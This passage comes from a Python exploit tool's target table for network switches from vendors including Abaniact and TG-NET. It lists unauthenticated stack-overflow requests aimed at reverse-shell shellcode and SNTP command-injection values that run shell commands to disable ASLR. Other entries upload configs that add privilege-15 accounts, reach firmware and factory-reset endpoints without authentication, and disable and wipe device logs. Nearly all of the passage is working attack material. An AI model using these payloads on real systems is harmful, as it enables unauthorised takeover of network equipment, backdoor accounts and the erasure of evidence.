False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',\t# Enable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&empty=1',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&target=0',\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&target=1',\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB 
workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no 
ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Abaniact': {\r\n\t\t\t\t'vendor': 'Abaniact',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=5121',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_5132=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_5132=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to 
verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack 
overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=526&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': 
True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. 
We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&login=1&_CMD_',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':False,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ 
self.random_string(180) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround': True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP&password=_PWDNOP_RA_START&login=1&shellcode=_USRNOP_USRNOP_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'TG-NET': {\r\n\t\t\t\t'vendor': 'Shenzhen TG-NET Botone Technology Co,. 
Ltd.',\r\n\t\t\t\t'uri':'http://www.tg-net.net/productshow.asp?ProdNum=1049&parentid=98',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=4353',\r\n\t\t\t\t\t\t'status':'/cgi-bin/dispatcher.cgi?cmd=4352',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_4364=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_4364=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': 
True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadfirmware.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadfirmware.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload_runstart_cfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload_runstart_cfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'version_upgrade.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (Frontend to \"httpuploadfirmware.cgi\")',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/version_upgrade.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'Firm Upgrade',\r\n\t\t\t\t\t\t\t'content_check':'Firm Upgrade',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': 
True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'factory_reset.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Reset device to factory default (PoC: Too dangerous to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/factory_reset.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'Too dangerous to verify',\r\n\t\t\t\t\t\t\t'content_check':'dummy',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': False\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sysinfo_config.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'description':'System basic information configuration (Frontend to \"change_mac_addr_set.cgi\")',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sysinfo_config.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'\"/cgi-bin/change_mac_addr_set',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'change_mac_addr_set.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"switch_type/sys_hardver\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/change_mac_addr_set.cgi',\r\n\t\t\t\t\t\t\t'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': 